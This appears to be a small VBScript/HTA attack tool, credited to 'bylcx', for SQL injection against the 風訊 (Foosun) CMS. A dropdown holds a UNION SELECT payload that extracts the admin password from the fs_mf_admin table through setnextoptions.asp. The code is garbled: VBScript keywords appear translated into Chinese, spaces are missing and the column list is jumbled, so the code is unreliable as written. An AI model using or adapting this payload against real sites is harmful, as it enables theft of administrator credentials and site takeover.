<ScriptLanguage =“ VBScript”>
SupWindow_Onload
Window.Resizeto450,380
Window.Moveto300,300
endub
</script>
<ScriptLanguage =“ VBScript”>
功能GetTtppage(路徑)
t = getBody(路徑)
gethtppage = bytestobstr(t,“ gb2312”)
document.getElementById(“ url”)。 innertext = gethttppage
最終功能
</script>
<ScriptLanguage =“ VBScript”>
functiongoby(url)
Onorresumenext
setRetRieval = createObject(“ Microsoft.xmlhttp”)
撤消
.open“ get”,url,false,“”,“”
。發送
getbody = .Responsebody
端
setRetRieval =沒有
最終功能
功能bytestobstr(身體,CSET)
dimobjstream
setObjstream = createObject(“ adodb.stream”)
objstream.type = 1
objstream.mode = 3
Objstream.open
objstream.writebody
objstream.position = 0
objstream.type = 2
objstream.chareet = CSET
bytestobstr = objstream.readtext
objstream.close
setObjstream =沒有
最終功能
</script>
<title> bylcx </title>
<inputId =“ urlcode” name =“ urlcode” size =“ 60” value =“ http://風訊 url/user/setnextoptions.asp”>
<selectid =“ sql” name =“ sql” onChange = vbs:gethttppage(document.getElementById(“ urlcode”)。value+document+document.getElementById(“ sql”)。value)>
<optionValue =“”>風訊sql版註入,shell的語句懶得寫了</option>
<optionValue =“?equvalue = 1&reqsql = select%201,admin_pass_word,3,4,5,6,7,8,9,10,11,112,12,13,14,15,15,16,17,19,19,221,221,223,223,223,25555 ,255,26,26,26,27,255,25,26,26,27,2 28,29,30,31,32,33,34,36,36,37,38,39,40,42,42,42,43,44,44,45,45,46,46,48,48,49,48,48,49,48,49,51%20 from%20fs_mf_admin%20 where%20 dhere%20ID = 1-1-1-1-1-1-1-1-1-1->>>